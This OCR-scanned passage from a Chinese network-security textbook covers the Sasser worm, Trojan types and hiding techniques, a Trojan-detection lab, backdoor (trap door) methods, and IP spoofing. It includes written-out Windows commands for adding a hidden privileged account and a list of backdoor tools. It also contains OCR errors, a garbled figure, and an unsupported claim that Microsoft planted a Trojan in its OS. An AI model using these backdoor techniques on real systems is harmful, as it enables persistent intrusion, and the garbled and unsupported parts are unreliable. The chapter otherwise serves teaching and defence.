开 这 个 字符 串 对 应 的 键 值 时 ,会 发 生 基于 栈 的 缓冲 区 溢出 。 如 果 溢 出 成 功 ,蠕虫 将 取得 系统 
控制 权 , 并 开始 向 随机 IP 地 址 发 送 自身 。 


5. 震荡 波 


震荡 波 (worm. sasser) 是 一 种 长 度 为 15 872 字 节 的 蠕虫 , 它 依 赖 于 Windows NT/ 
2000/XP/Server2003, 以 系统 漏洞 为 传播 途径 。 下 面 介 绍 震荡 波 的 传播 过 程 。 

(1) 复制 自身 到 系统 目录 (名 为 %WINDOWS%\avserve2. exe,15 872 字 节 ) ,然后 登记 
到 自 启动 项 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 

avserve2, exe = WINDOWS%\avserve2. exe 


(2) 开辟 线程 ,在 本 地 开辟 后 门 : 监听 TCP 5554 端口 (支持 USER、PASS、 PORT、 
RETR 和 QUIT 命令 ) ,被 攻击 的 机 器 主动 连接 本 地 5554 端口 ,并 把 IP 地 址 和 端口 传 过 来 。 
本 线程 负责 把 病毒 文件 传送 到 被 攻击 的 机 器 。 

(3) 开辟 128 个 扫描 线程 。 以 本 地 IP 地 址 为 基础 , 取 随 机 IP 地 址 ,疯狂 地 试探 连接 
445 端口 : 如 果 试 探 成 功 , 则 运行 一 个 新 的 病毒 进程 对 该 目标 进行 攻击 ,把 该 目标 的 IP 地址 
保存 到 c: \win2. log。 

(4) 利用 Windows 的 LSASS 中 存在 一 个 缓冲 区 溢出 漏洞 进行 攻击 。 一 旦 攻击 成 功 ， 
会 导致 对 方 机 器 感染 此 病毒 并 进行 下 一 轮 的 传播 。 攻 击 失 败 也 会 造成 对 方 机 器 的 缓冲 区 洪 
出 ,导致 对 方 机 器 程序 非法 操作 ,以 及 系统 异常 等 。 由 于 该 病毒 在 lsass. exe 中 溢出 ,可 以 获 
取 管理 员 的 权限 ,并 执行 任意 指令 。 

(5) 溢出 代码 会 主动 从 原 机 器 下 载 病毒 程序 ,运行 起 来 .开始 新 的 攻击 。 


4.3 特洛伊 木马 


4.3.1 特洛伊 木马 及 其 类 型 


古 希 腊 许 人 荷 马 (Homer) 在 其 史诗 依 利雅 得 (The Iliad) 中 ,描述 了 一 个 故事 : 希腊 王 
的 王妃 海伦 被 特洛伊 (Troy) 的 王子 掠 走 , 希 腊 王 在 攻打 Troy 城 时 ,使 用 了 木马 计 (the 
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stratagem of Trojan horse) ,在 巨大 的 木马 内 装 满 了 士兵 ,然后 假装 撤退 ,把 木马 留 下 。 特 
洛 伊人 把 木马 当 作 战利品 拉 回 特洛伊 城内 。 到 了 夜间 ,木马 内 的 士兵 , 销 出 来 作为 内 应 , 打 
开 城 门 。 和 希腊 王 得 以 攻 下 特洛伊 城 。 此 后 ,人 们 就 把 特洛伊 木马 (Trojan horse) 作 为 伪装 的 
内 部 颠覆 者 的 代名词 。 

RFC1244(Request for Comments: 1244) 中 ,关于 特洛伊 木马 程序 的 定义 是 : 特洛伊 木 
马 程序 是 一 种 程序 , 它 能 提供 一 些 有 用 的 或 者 令 人 感 兴 趣 的 功能 。 但 是 还 具有 用 户 不 知道 
的 其 他 功能 ,例如 在 用 户 不 知晓 的 情况 下 复制 文件 或 窃取 密码 。 简 单 地 说 ,凡是 人 们 能 在 本 
地 计算 机 上 操作 的 功能 ,木马 基本 上 都 能 实现 。 

根据 木马 程序 对 计算 机 的 动作 方式 ,木马 程序 可 以 分 为 如 下 几 种 类 型 ; 


1. 远程 控制 型 


远程 控制 型 是 木马 程序 的 主流 。 所 谓 远 程控 制 就 是 在 计算 机 间 通 过 某 种 协议 (如 
TCP/IP 协议 ) 建 立 起 一 个 数据 通道 。 通 道 的 一 端 发 送 命令 , 另 一 端 解释 并 执行 该 命令 ,并 
通过 该 通道 返回 信息 。 简 单 地 说 ,就 是 采用 client/server( 客 户 机 /服务 器 ,简称 C/S) 工 作 
模式 。 

采用 C/S 模式 的 木马 程序 都 由 两 部 分 组 成 : 一 部 分 称 为 被 控 端 (通常 是 监听 端口 的 
server 端 ) , 另 一 部 分 称 为 控制 端 (通常 是 主动 发 起 连接 的 client 端 ) 。 被 控 端 的 主要 任务 是 
隐藏 在 被 控 主 机 的 系统 内 部 ,并 打开 一 个 监听 端口 ,就 像 隐 藏 在 木马 中 的 战士 ,等待 着 攻击 
的 时 机 , 当 接 收 到 来 自控 制 端的 连接 请 求 后 ,主线 程 立 即 创 建 一 个 子 线程 并 把 请 求 交 给 它 处 
理 , 同 时 继续 监听 其 他 的 请 求 。 控 制 端的 任务 只 是 发 送 命令 ,并 正确 地 接收 返回 信息 。 

这 种 类 型 的 木马 运行 起 来 非常 简单 ,只 要 先 运行 服务 端 程序 ,同时 获得 远程 主机 的 IP 
地 址 ,控制 者 就 能 任意 访问 被 控制 端的 计算 机 ,从 而 使 远程 控制 者 在 本 地 计算 机 上 做 任意 想 
做 的 事情 。 


2. 信息 窃取 型 


信息 窃取 型 木马 的 目的 是 收集 系统 上 的 敏感 信息 ,例如 用 户 登录 类 型 ,用户 名 .口令 、 密 
码 等 。 这 种 木马 一 般 不 需要 客户 端 , 运 行 时 不 会 监听 端口 ,只 悄悄 地 在 后 台 运 行 ,一 边 收集 
敏感 信息 ,一 边 不 断 检 测 系统 的 状态 。 一 旦 发 现 系 统 已 经 连接 到 Internet 上 ,就 在 受害 者 不 
知情 的 情形 下 将 收集 的 信息 通过 一 些 常用 的 传输 方式 (如 电子 邮件 ICQ、FTP) 把 它们 发 送 
到 指定 的 地 方 。 


3. 键盘 记录 型 


键盘 记录 型 木马 只 做 一 件 事情 ,就 是 记录 受害 者 的 键盘 项 击 , 并 完整 地 记录 在 LOG 文 
件 中 。 


4. 毁坏 型 


毁坏 型 木马 以 毁坏 并 删除 文件 (如 受害 者 计算 机 上 的 . dll、. ini 或 . exe) 为 主要 目的 。 
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4.3.2 特洛伊 木马 的 特征 


木马 是 一 种 危害 性 极 大 的 恶意 代码 。 它 可 以 窃取 数据 , 自 改 、 破 坏 数据 和 文件 ,释放 病 
毒 ,执行 远程 非法 操作 者 的 指令 ,甚至 可 以 使 系统 自 毁 。 下 面 介绍 它 的 特征 : 


1. 非 授权 性 与 自动 运行 性 


一 且 控 制 端 与 服务 端 建 立 连接 后 ,控制 端 将 窃取 用 户 密 码 ,获取 大 部 分 操作 权限 ,如 修 
改 文 件 .修改 注册 表 .重启 或 关闭 服务 端 操 作 系统 . 断 开 网 络 连接 .控制 服务 端 鼠 标 和 键盘 、 
监视 服务 端 桌 面 操作 ,查看 服务 端 进程 等 。 这 些 权限 不 是 用 户 授权 的 ,而 是 木马 自己 窃 
取 的 。 


2. 隐藏 性 和 欺骗 性 


隐藏 是 一 切 恶意 代码 的 存在 之 本 。 木 马 为 了 获得 非 授 权 的 服务 ,还 要 通过 欺骗 进行 
隐藏 。 


3. 可 预 置 性 


木马 程序 可 以 在 系统 软件 和 应 用 软件 的 文件 传播 中 被 人 置信, 也 可 以 在 系统 或 软件 设 
计时 被 故意 放置 进来 。 例 如 微软 曾 在 其 操作 系统 设计 时 故意 放置 了 一 个 木马 程序 ,可 以 将 
客户 的 相关 信息 发 回 到 其 总 部 。 


4. 非 自 繁殖 性 与 非 自动 感染 性 


一 般 来 说 ,病毒 具有 极 强 的 传染 性 ,而 木马 虽然 可 以 传播 ,但 本 身 不 具备 繁殖 性 和 自动 
感染 的 功能 。 


4.3.3 特洛伊 木马 的 传播 形式 


木马 的 传播 都 是 先进 行 伪装 或 改头换面 (如 利用 exe 文件 绑 定 将 木马 捆绑 在 小 游戏 上 ， 
或 将 木马 的 图 标 直接 改 为 html、txt、jpg 等 文件 的 图 标 ) ,然后 进行 传播 。 下 面 介绍 木马 的 
几 种 传播 形式 。 

(1) 手工 放置 : 手工 放置 比较 简单 ,是 最 常见 的 做 法 。 手 工 放 置 分 本 地 放置 和 远程 放 
置 两 种 。 本 地 放置 就 是 直接 在 计算 机 上 进行 安装 。 远 程 放 置 就 是 通过 常规 攻击 手段 ,获得 
目标 主机 的 上 传 权限 后 ,将 木马 上 传 到 目标 计算 机 上 ,然后 通过 其 他 方法 使 木马 程序 运行 
起 来 。 

(2) 以 邮件 附件 的 形式 传播 : 控制 端 将 木马 改头换面 后 ,然后 将 木马 程序 添加 到 附件 
中 ,发送 给 收 件 人 。 

(3) 通过 OICQ 对 话 ,利用 文件 传送 功能 发 送 伪装 了 的 木马 程序 。 

(4) 将 木马 程序 捆绑 在 软件 安装 程序 上 ,通过 提供 软件 下 载 的 网 站 (Web/FTP/BBS) 
传播 。 

(5) 通过 病毒 或 蠕虫 程序 传播 。 
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(6) 通过 磁盘 或 光盘 传播 。 
4.3.4 特洛伊 木马 的 基本 技术 


1. 木马 的 隐藏 与 欺骗 技术 


隐藏 是 一 切 恶意 代码 生存 之 本 ,欺骗 是 通过 伪装 实现 隐藏 的 一 种 技巧 。 下 面 介绍 木马 
的 几 种 隐藏 手 段 : 

(1) 进程 隐蔽 。 服 务 器 端 想 要 隐藏 木马 ,可 以 伪 隐 藏 ,也 可 以 真 隐藏 。 伪 隐藏 ,就 是 指 
程序 的 进程 仍然 存在 ,只 不 过 是 让 它 消失 在 进程 列表 里 。 真 隐藏 则 是 让 程序 彻底 的 消失 ,不 
以 一 个 进程 或 者 服务 的 方式 工作 。 

伪 隐 藏 的 方法 比较 简单 。 在 Windows 9x 系统 中 ,只 要 把 木马 服务 器 端的 程序 注册 为 
一 个 服务 (在 后 台 工 作 的 进程 ) 就 可 以 了 。 这 样 ,程序 就 会 从 任务 列表 中 消失 ,系统 不 再 认为 
是 一 个 进程 , 当 按 下 Ctrl 十 Alt 十 Delete 组 合 键 的 时 候 , 也 就 看 不 到 这 个 进程 。 对 于 Win- 
dows NT、Windows 2000 等 ,通过 服务 管理 器 则 要 使 用 API 的 拦截 技术 ,通过 建立 一 个 后 
人 台 的 系统 钧 子 拦截 PSAPI 的 EnumProcessModules 等 相关 的 函数 实现 对 进程 和 服务 的 遍 
历 调用 的 控制 , 当 检测 到 进程 ID(PID) 为 木马 程序 的 服务 器 端 进程 的 时 候 则 直接 跳 过 ,这 样 
就 实现 了 进程 的 隐藏 。 金 山 词 霸 等 软件 就 是 使 用 了 类 似 的 方法 ,拦截 了 TextOutA、 
TextOutW 函数 ,截获 屏幕 输出 ,实现 即时 翻译 。 同 样 ,这 种 方法 也 可 以 用 在 进程 隐藏 上 。 

当 进 程 为 真 隐藏 的 时 候 , 这 个 木马 的 服务 器 部 分 程序 运行 之 后 ,就 不 应 该 具备 一 般 进程 
的 特征 ,也 不 应 该 具备 服务 特征 , 即 它 完全 溶 进 了 系统 的 内 核 。 因 此 可 以 不 把 它 做 成 一 个 应 
用 程序 ,而 把 它 作为 一 个 线程 , 即 一 个 其 他 应 用 程序 的 线程 ,把 自身 注入 其 他 应 用 程序 的 地 
址 空间 。 而 这 个 应 用 程序 对 于 系统 来 说 ,是 一 个 绝对 安全 的 程序 ,这 样 就 达到 了 彻底 隐藏 的 
效果 。 

(2) 伪装 成 图 像 文件 ,即将 木马 图 标 修改 成 图 像 文件 图 标 。 

(3) 伪装 成 应 用 程序 扩展 组 件 。 将 木马 程序 写成 任何 类 型 的 文件 (如 dll ,ocx 等 ) ,然后 
挂 在 十 分 出 名 的 软件 中 。 因 为 人 们 一 般 不 怀疑 这 些 软件 。 

(4) 错觉 欺骗 。 利 用 人 的 错觉 ,例如 故意 混 消 文件 名 中 的 1( 数 字 ) 与 1(L 的 小 写 ) .0( 数 
字 ) 与 o( 字 母 ) 或 O( 字 母 ) 。 

(5) 合并 程序 欺骗 。 合 并 程序 就 是 将 两 个 或 多 个 可 执行 文件 结合 为 一 个 文件 ,使 这 些 
可 执行 文件 能 同时 执行 。 木 马 的 合并 欺骗 就 是 将 木马 绑 定 到 应 用 程序 中 。 


2. 程序 的 自 加 载运 行 技术 


在 受害 系统 中 驻 留 的 木马 程序 应 当 具有 自 加 载 启 动 运行 功能 。 让 程序 自 运行 的 方法 比 
较 多 。 最 常见 的 方法 是 对 Windows 系统 注册 表 .win. ini 文件 、system. ini 文件 或 启动 组 文 
件 进行 修改 。 


3. 木马 程序 建立 连接 的 隐藏 技术 


木马 程序 的 数据 传递 方法 有 很 多 种 ,通常 是 靠 TCP、UDP 传输 数据 。 这 时 可 以 利用 
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Winsock 与 目标 机 的 指定 端口 建立 起 连接 ,使 用 send 和 recv 等 API 进行 数据 的 传递 ,但 是 
这 种 方法 的 隐蔽 性 比较 差 ,往往 容易 被 一 些 工 具 软 件 查看 到 ,例如 在 命令 行 状态 下 使 用 net- 
stat 命令 ,就 可 以 查看 到 当前 的 活动 TCP、UDP 连接 。 

为 了 躲避 这 种 侦察 ,可 以 采用 多 种 方法 ,例如 合并 端口 法 和 使 用 ICMP(Internet control 
message protocol) 协 议 进 行 数据 发 送 的 方法 。 

合并 端口 是 在 一 个 端口 上 同时 绑 定 两 个 TCP 或 者 UDP 连接 ,通过 把 自己 的 木马 端口 
绑 定 于 特定 的 服务 端口 (比如 80 端口 的 HTTP) 之 上 ,从 而 达到 隐藏 端口 的 目的 。 

使 用 ICMP 协议 进行 数据 发 送 的 方法 ,是 通过 修改 ICMP 头 的 构造 ,加 入 木马 的 控制 字 
段 。 这 样 的 木马 具备 很 多 新 的 特点 ,例如 : 不 占用 端口 ,使 用 户 难以 发 觉 ; 使 用 ICMP 可 以 
穿 透 一 些 防火 墙 ,从 而 增加 防范 的 难度 。 


4. 发 送 数 据 的 组 织 方法 


为 了 避免 被 发 现 ,木马 程序 必须 很 好 地 控制 数据 的 传输 量 , 例 如 把 屏幕 画面 切 分 为 多 个 
部 分 ,并 将 画面 存储 为 JPG 格式 ,使 压缩 率 变 高 ,使 数据 变 得 十 分 小 ,甚至 在 屏幕 没有 改变 
的 情况 下 ,传送 的 数据 量 为 0。 


实验 12 判断 并 清除 木马 


1. 实验 目的 


(1) 掌握 在 TCP/IP 系统 中 判断 木马 的 方法 。 
(2) 掌握 手工 清除 常见 木马 的 基本 方法 。 


2. 说 明 1: 查看 开放 端口 进行 木马 判断 


当前 最 常见 的 木马 是 基于 TCP/IP 协议 .按照 C/S 模式 工作 的 。 这 样 ,被 种 上 木马 服 
务 器 就 会 打开 监听 端口 等 待 连接 。 例 如 ,冰河 木马 的 监听 端口 是 7626 ,Back Orifice 2000 使 
用 的 端口 是 54320, 因 此 ,通过 查看 本 机 开放 端口 ,就 可 以 判定 自己 的 机 器 是 否 中 了 木马 或 
黑客 程序 。 

下 面 介绍 几 种 查看 开放 端口 的 方法 。 

(1) 使 用 Windows 自身 带 的 命令 netstat 

netstat 命令 是 Windows 自 带 的 运行 在 TCP/IP 环境 下 的 一 个 命令 。 它 可 以 显示 并 统 
计 有 关连 接 和 侦 听 端口 。 其 命令 格式 如 下 : 

netstat [-a| [-e] [-n] [-s] [-p protocol] [-r] [interval] 


。-a 显示 所 有 连接 和 侦 听 端口 。 

。-e 显示 以 太 网 统计 ,可 以 与 -s 选项 结合 使 用 。 

。-n 以 数字 格式 显示 地 址 和 端口 号 。 

。-s 显示 protocol 指定 的 协议 的 统计 ,默认 协议 为 TCP .UDP ICMP IP。 
。-p 显示 protocol 指定 的 连接 。 


。-r 显示 路 由 表 内 容 。 

。 interval 重新 显示 所 选 的 统计 ,每 次 显示 之 间 的 暂停 时 间 由 interval 设 定 。 
(2) 在 Windows 2000 下 使 用 命令 行 工具 fport。 

(3) 使 用 与 fport 功能 相同 的 图 形 界面 工具 Active Ports。 


3. 说 明 2: 常见 木马 的 手工 清除 方法 


不 同 的 木马 根据 其 工作 原理 和 危害 ,有 不 同 的 手工 清除 方法 。 这 些 方法 在 网 络 上 可 以 
搜索 到 。 


4. 实验 准备 


(1) 上 网 搜索 一 种 可 以 查看 开放 端口 的 工具 ,记录 安装 和 使 用 的 方法 。 
(2) 上 网 搜索 并 记录 多 种 木马 的 手工 清除 方法 。 


5. 实验 内 容 


(1) 下 载 并 安装 一 种 查看 开放 端口 的 软件 。 
(2) 用 下 载 软件 查看 自己 机 器 的 端口 。 

(3) 记录 查看 软件 的 显示 内 容 。 

(4) 对 所 发 现 的 木马 进行 手工 清除 。 


6. 推荐 的 分 析 讨论 内 容 


(1) 你 遇 到 过 哪些 木马 ?它们 有 些 什 么 危害 ? 
(2) 你 使 用 过 哪 几 种 端口 查看 命令 或 软件 ”它们 各 有 什么 特点 ? 
(3) 其 他 发 现 或 想到 的 问题 。 


4.4 陷 门 


4.4.1 陷 门 及 其 特征 


陷 门 (trap doors) 也 称 " 后 门 ”, 是 一 种 利用 系统 脆弱 性 进行 重复 攻击 的 技术 ,通常 是 一 
段 非法 的 操作 系统 程序 ,通过 它 可 以 在 一 个 程序 模块 中 留 下 未 被 登记 的 秘密 入 口 ,使 用 户 可 
以 不 按 正 常 的 访问 步骤 获得 访问 权 。 它 们 有 些 是 程序 员 为 了 进行 调试 和 测试 而 预 留 的 一 些 
特权 ;有 些 则 是 入侵 者 在 完成 人 侵 目标 后 ,为 了 能 够 继续 保持 对 系统 的 访问 特权 而 采用 的 一 
些 技术 。 

陷 门 一 般 有 如 下 一 些 技术 或 功能 特征 : 

(1) 陷 门 通常 寄生 于 某 些 程序 (有 宿主 ) ,但 无 自我 复制 功能 。 

(2) 它们 可 以 在 系统 管理 员 采 取 了 增强 系统 安全 措施 (如 改变 所 有 密码 ) 的 情况 下 , 照 
样 进入 系统 。 

(3) 它们 可 以 使 攻击 者 以 最 短 的 时 间 再 次 进入 系统 ,而 不 是 重新 挖掘 漏洞 。 
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(4) 许多 陷 门 可 以 饶 过 注册 ,直接 进入 系统 或 者 帮助 攻击 者 隐藏 其 在 系统 中 的 一 举 
一 动 。 
(5) 陷 门 可 以 把 再 次 入 侵 而 被 发 现 的 可 能 性 降 至 最 低 。 


4.4.2 常见 陷 门 举例 


1. 账号 与 注册 陷 门 


(1) Login 陷 门 

在 UNIX 中 ,Login 程序 常用 来 对 Telnet 来 的 用 户 进 行 口令 验证 。 入 侵 者 获取 Login 
的 源 代码 并 修改 ,使 它 在 比较 输入 口令 与 存储 口令 时 先 检查 陷 门 口令 。 当 入 侵 者 输入 陷 门 
口令 后 ,Login 程序 将 忽视 管理 员 设置 的 口令 而 让 入 侵 者 长 驱 直 人。 使 用 这 种 方法 ,人 侵 者 
可 以 进入 任何 账号 ,甚至 是 root 目录 。 

(2) 密码 破解 陷 门 

密码 破解 陷 门 , 即 破解 口令 薄弱 的 账号 ,多 数 是 寻找 口令 薄弱 的 未 使 用 账号 ,并 使 管理 
人 员 无 法 判断 哪些 账号 应 当 封存 。 

(3) 超级 账号 陷 门 

超级 账号 (root、Administrator 和 Admin) 是 系统 安全 的 宝贵 资源 。 入 侵 者 一 旦 可 以 创 
建 这 样 的 账号 ,就 可 以 拥有 很 大 的 权力 。 在 Windows NT/2000 上 可 以 使 用 下 面 的 命令 创 
建 本 地 特权 账号 。 


net user <username> =password>/ADD 
net localgroup =groupname> =username>/ADD 


在 UNIX 下 ,在 口令 文件 中 增加 一 个 UID 为 0 的 账号 ,是 创建 超级 账号 的 最 简单 方法 。 

(4) rhosts 十 十 陷 门 

在 联网 的 UNIX 机 器 中 , 像 Rsh 和 Rlogin 这 样 的 服务 是 基于 rhosts 的 。 入 侵 者 只 要 
向 可 以 访问 的 用 户 的 rhosts 文件 中 输入 十 十 ,就 可 以 允许 任何 人 从 任何 地 方 进入 这 个 账 
户 。 这 些 账号 也 成 了 入 侵 者 再 次 侵入 的 陷 门 。 


2. 网 络 通 行 陷 门 


入 侵 者 不 仅 想 隐匿 在 系统 里 ,而 且 还 要 隐匿 他 们 的 网 络 通行 陷 门 。 这 些 网 络 通行 陷 门 
有 时 允许 人 侵 者 通过 防火 墙 进行 访问 。 有 许多 网 络 陷 门 程序 允许 人 侵 者 建立 某 个 端口 号 ， 
并 且 不 通过 普通 服务 就 能 实现 访问 。 因 为 这 是 通过 非 标准 网 络 端口 的 通行 ,管理 员 可 能 忽 
视 入 侵 者 的 足迹 。 这 种 陷 门 通常 使 用 ICP、UDP 和 ICMP, 但 也 可 能 是 其 他 类 型 报 文 。 

(1) TCP shell 陷 门 

TCP shell 陷 门 建立 在 防火 墙 没 有 阻塞 的 高 位 TCP 端口 ,例如 ,可 能 建立 在 SMTP 端 
口 ,因为 很 多 防火 墙 允许 E-mail 通过。TCP shell 陷 门 可 以 让 入 侵 者 躲 过 TCP wrapper 技 
术 。 这 些 端口 在 许多 情况 下 受 口令 保护 ,以 防 管理 员 连 接 后 察觉 。 管 理 员 可 以 用 netstat 命 
令 查 看 当前 的 连接 状态 以 及 有 关 端 口 的 使 用 情况 。 
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(2) UDP shell 陷 门 

通常 入 侵 者 将 UDP shell 陷 门 放 置 在 DNS 端口 ,因为 许多 防火 墙 设 置 成 允许 类 似 
DNS 的 UDP 报 文 的 通行 。 由 于 UDP 是 无 连接 的 ,管理 员 不 会 像 观察 TCP 连接 的 怪异 情 
况 那 样 发 现 它 ,因而 不 能 用 netstat 显示 入 侵 者 的 访问 痕迹 。 

(3) ICMF shell 陷 门 

由 于 许多 防火 墙 允许 外 部 ping 内 部 的 机 器 ,所 以 入 侵 者 可 以 将 数据 放 入 ping 的 ICMP 
包 , 在 ping 的 机 器 间 形 成 一 个 shell 通道 。 虽然 管理 员 也 许 会 注意 到 ping 包 , 但 他 不 查看 
包 内 数据 就 不 会 了 解 哪些 是 入 侵 者 的 数据 包 。 


3. 隐匿 陷 门 


(1) 隐匿 进程 陷 门 

入 侵 者 通常 想 隐 匿 他 们 运行 的 程序 。 这 样 的 程序 一 般 是 口令 破解 程序 和 监听 程序 
(sniffer)。 有 许多 办 法 可 以 实现 他 们 的 目的 , 较 通 用 的 有 : 

。 编写 程序 时 修改 自己 的 argv 使 它 看 起 来 像 其 他 进程 名 。 

。 将 sniffer 程序 改名 再 执行 。 

。 修改 库 函 数 致使 ps 不 能 显示 所 有 进程 。 

。 将 一 个 陷 门 或 程序 内 入 中 断 驱 动 程序 使 它 不 会 在 进程 表 显 现 。 

(2) 文件 系统 陷 门 

入 侵 者 也 需要 在 服务 器 上 存储 他 们 的 掠夺 品 或 数据 ,并 不 被 管理 员 发 现 。 入 侵 者 的 文 
件 一 般 有 exploit 脚本 工具 、 陷 门 集 .sniffer 日 志 、E-mail 的 备份 、 源 代码 等 。 为 了 防止 管理 
员 发 现 这 些 文件 ,入 侵 者 需要 修补 ls、du、fsck, 以 隐匿 特定 的 目录 和 文件 。 在 很 低 的 级 别 ， 
入 侵 者 做 这 样 的 漏洞 : 以 专 有 的 格式 在 硬盘 上 制 出 一 部 分 ,表示 为 坏 的 扁 区 ,使 管理 人 员 难 
发 现 这 些 “ 坏 鹿 区 ?里 的 文件 。 

(3) 共享 库 陷 门 

几乎 所 有 的 UNIX 系统 都 使 用 共享 库 , 而 管理 员 很 少 检查 这 些 库 , 因 此 一 些 人 侵 者 在 
向 cryPt.c 和 _crypt. c 等 函数 里 做 了 陷 门 。 

(4) Cronjob 陷 门 

UNIX 上 的 Cronjob 可 以 按时 间 表 调度 特定 程序 运行 。 例 如 入 侵 者 可 以 加 入 陷 门 shell 
程序 ,使 它 在 深夜 1 点 到 2 点 之 间 运 行 。 

(5) 内 核 陷 门 

内 核 是 UNIX 工作 的 核心 。 使 库 躲 过 MD5 校 验 的 方法 同样 适用 于 内 核 级 别 。 

(6) Boot 块 陷 门 

一 些 人 侵 者 将 一 些 陷 门 留 在 根 区 ,因为 在 UNIX 下 多 数 管理 员 不 检查 根 区 的 软件 。 

(7) 网 络 服务 陷 门 

网 络 服务 陷 门 是 以 服务 方式 启动 陷 门 或 把 陷 门 放置 在 服务 程序 有 关 的 文件 中 。 例 如 在 
Windows NT 中 可 以 采用 以 服务 方式 启动 陷 门 程序 ,使 陷 门 随 系统 运行 而 自动 启动 。 这 样 
会 带 来 手工 不 易 删 除 和 隐藏 性 好 的 好 处 。 在 UNIX 中 ,由 于 系统 管理 员 在 一 般 情况 下 不 经 
常 检查 超级 服务 器 守护 进程 (ineted) ,因此 这 些 配置 文件 就 成 为 放置 陷 门 的 好 地 方 。 
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4.4.3 一 些 常见 陷 门 工具 


下 面 是 黑客 常用 的 创建 陷 门 的 工具 : 

。 rootkit .cron at secadmin Invisible Keystoke remove. exe\rcCUNIX); 
。 Windows 启动 文件 夹 ; 

。 Su7(http: //www. sub7. net); 

。 Netcat(http: //www. atstake. com/research/tools); 

*。 VNC(http: //www. alvnc. com); 

。 BO2K(http: //www. sourceforge. net/projects/ bo2k) 。 


4.5 电子 欺骗 攻击 


电子 欺骗 是 与 认证 (authentication) 和 信任 (trust) 相 联系 的 一 个 概念 。 认 证 是 网 络 上 
的 计算 机 相互 间 进行 识别 的 过 程 。 信 任 是 经 过 认证 获准 连接 的 相互 关系 。 信 任 有 程度 之 
分 ,有 高 度 信 任 关系 的 两 台 计 算 机 进行 连接 ,一 般 不 需要 严格 的 认证 ;而 信任 程度 较 低 的 两 
台 计 算 机 之 间 进 行 连接 ,就 需要 进行 严格 的 认证 。 

电子 欺骗 (spoofing) 就 是 在 两 台 建 立 了 信任 关系 的 计算 机 之 间 冒 充 其 中 一 台 , 对 另 一 
台 进 行 欺 骗 性 连接 ,而 后 对 其 发 起 攻击 。 这 种 欺骗 可 以 通过 不 同 的 网 络 协议 漏洞 进行 。 电 
子 欺 骗 的 种 类 很 多 ,下 面 仅 举 几 个 常见 的 例子 加 以 介绍 。 


4.5.1 IP 欺骗 


1. IP 欺骗 方法 


IP 欺骗 就 是 冒 用 别 的 机 器 的 IP 地 址 欺骗 第 三 者 。 假 定 有 两 台 主 机 S( 设 IP 地 址 为 
201. 15. 192. 01) 和 T( 设 IP 地 址 为 201. 15. 192. 02) ,并 且 它 们 之 间 已 经 建立 了 信任 关系 。 
和 信 侵 者 X 要 对 工 进 行 IP 欺骗 攻击 ,就 可 以 假冒 S 与 进行 通信 。 图 4. 10 为 IP 欺骗 的 基 
本 过 程 。 


无 使 。 冒 号 月 
确 法 要 狂 汪 充 回 狂 让 
认 响 到 妥 施 
攻 应 是 测 目 罕 应 测 会 
目 标 主 号 主 机 主 序 攻 
标 天 机 机 连 机 列 而 


图 4.10 IP 欺 骗 的 基本 过 程 


(1) 确认 攻击 目标 
施行 IP 欺骗 的 第 一 步 是 确认 攻击 目标 。 下 面 是 容易 受到 电子 欺骗 攻击 的 服务 类 型 : 
。 运行 Sun RPC(Sun remote procedure call,Sun 远程 过 程 调 用 ) 的 网 络 设备 ; 
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。 基于 IP 地 址 认证 的 任何 网 络 服务 ; 

。 提供 R 系列 服务 的 机 器 ,如 提供 rlogin .rsh .rcp 等 服务 的 机 器 。 

其 他 没有 这 类 服务 的 系统 所 受到 的 IP 欺骗 攻击 虽然 有 ,但 要 少 得 多 。 

(2) 使 计划 要 冒充 的 主机 无 法 响应 目标 主机 的 会 话 

当 X 要 对 工 实 施 IP 欺骗 攻击 时 ,就 要 假冒 S( 称 为 被 利用 者 ) 与 目标 主机 T 进行 通信 。 
但 是 ,X 并 不 是 真正 的 S。 因 此 ,为 了 不 是 由 于 工 向 S 回 送 的 报 文 , 使 S 对 T 的 报 文 产生 反 
应 ,而 使 X 暴 露 ,X 就 要 设法 使 S 瘫痪 ,使 之 无 法 响应 目标 主机 T 的 数据 报 文 。 

使 S 瘫痪 的 办 法 是 对 其 实施 拒绝 服务 攻击 ,例如 通过 SYN Flood 攻击 使 之 连接 请 求 被 
占 满 ,暂时 无 法 处 理 进入 的 其 他 连接 请 求 。 通 常 , 黑 客 会 用 一 个 虚假 的 IP 地 址 (可 能 该 合法 
IP 地 址 的 服务 器 没有 开机 ) 向 目标 主机 TCP 端口 发 送 大 量 的 SYN 请 求 。 受 攻击 的 服务 器 
则 会 向 该 虚假 的 IP 地 址 发 送 响应 ,自然 得 不 到 回应 ,得 到 的 是 该 服务 器 不 可 到 达 的 消息 。 
而 目标 主机 的 TCP 会 认为 这 是 暂时 的 不 通 ,继续 尝试 连接 ,直到 确信 无 法 连接 。 不 过 这 已 
经 为 黑客 进行 攻击 提供 了 充足 的 时 间 。 

(3) 精确 地 猜测 来 自 目标 请 求 的 正确 序列 数 

X 为 了 使 自己 的 攻击 不 露馅 的 另 一 个 措施 是 取得 被 攻击 目标 工 主 机 的 信任 。 由 于 
TCP 是 可 靠 传输 协议 ,每 台 主 机 要 对 自己 发 送出 的 所 有 字 节 分 配 序列 编号 , 供 接收 端 确认 
并 据 此 进行 报 文 装配 。 在 通过 三 次 握手 建立 TCP 连接 的 过 程 中 ,客户 端 首先 要 向 服务 器 发 
送 序列 号 zx; 服务 器 收 到 后 通过 确认 要 向 客户 端 送 回 期 待 的 序列 号 (z 十 1) 和 自己 的 序列 号 。 
由 于 序列 号 的 存在 ,给 IP 欺骗 攻击 增加 了 不 少 难度 ,要 求 攻击 者 X 必须 能 够 精确 地 猜测 出 
来 自 目标 机 的 序列 号 ,否则 也 会 露馅 。 

那么 ,如 何 精确 地 猜测 来 自 目 标 机 的 序列 号 呢 ? 这 就 需要 知道 TCP 序列 号 的 编排 
规律 。 

初始 的 TCP 序列 号 是 由 tcp_init 函数 确定 的 ,是 一 个 随机 数 ,并 且 它 每 秒 钟 增加 128 000。 
这 表明 在 没有 连接 的 情况 下 ,TCP 的 序列 号 每 9. 32 小 时 会 复位 一 次 ,而 在 有 连接 时 ,每 次 连接 
把 TCP 序列 号 增加 64 000。 

随机 的 初始 序列 号 的 产生 也 是 有 一 定 规律 的 。 在 Berkeley 系统 中 ,初始 序列 号 由 一 个 
常量 每 秒 钟 加 1 产生 。 

所 以 ,TCP 序列 号 的 估计 也 并 非 绝 对 不 可 能 。 但 是 , 除 此 之 外 ,攻击 者 还 需要 估计 他 的 
